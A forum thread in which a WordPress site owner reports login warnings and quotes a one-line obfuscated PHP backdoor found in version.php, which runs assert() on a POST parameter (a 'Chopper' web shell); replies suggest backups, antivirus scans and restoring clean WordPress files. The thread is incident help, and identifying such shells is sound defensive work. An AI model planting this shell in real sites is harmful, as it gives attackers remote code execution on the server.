# Wordpress Error on Admin page

Tags: php, wordpress

When I try to do log in in my wordpress page appears this errors:

> Warning: assert() [function.assert]: Assertion failed in
>   /home/osisonli/public_html/version.php on line 1 Chopper Connection
>   Warning: include_once(rc-templates/-row-templates.php)
>   [function.include-once]: failed to open stream: No such file or
>   directory in
>   /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php
>   on line 118
>
> Warning: include_once() [function.include]: Failed opening
>   'rc-templates/-row-templates.php' for inclusion
>   (include_path='.:/usr/lib/php') in
>   /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php
>   on line 118
>
> Warning: include_once(rc-templates/-col-templates.php)
>   [function.include-once]: failed to open stream: No such file or
>   directory in
>   /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php
>   on line 119

etc....

When I opened `/home/osisonli/public_html/version.php`, it's contains the following `$k="ass"."ert"; $k(${"_PO"."ST"} ['c']);` Chopper Connection

Obviously I think my server was hacked, but what can I do to resolve this? 
Is there somebody who happened this too?

Thanks in advance...

Answer (score 0):

1. Make backups and put it in a safe place.
2. After this download all your website files to local computer.
3. Check local directory with antivirus and cure infected files.
4. Download correct version of WordPress and replace damaged files from original distribution.
5. Upload data to remote server.

Answer (score 0):

First of all backup everything.

1. Then undone the changes if you had made prior to the occurring error.
2. If things does not solve out. Then download the current version of WordPress 
   Login to your hosting account then if you have then upload the all the files 
   except the wp-content.Better to use Filezilla to send files using FTP.
3. If problem persists, then I would recommend better to reinstall the WordPress.

Don't foget to backup

Answer (score 0):

PHP backdoor on your server.
Someone had access to your site through it. Most of the time regular bots scanning the net for vulnerable WP pages, and I think this is how your page was found.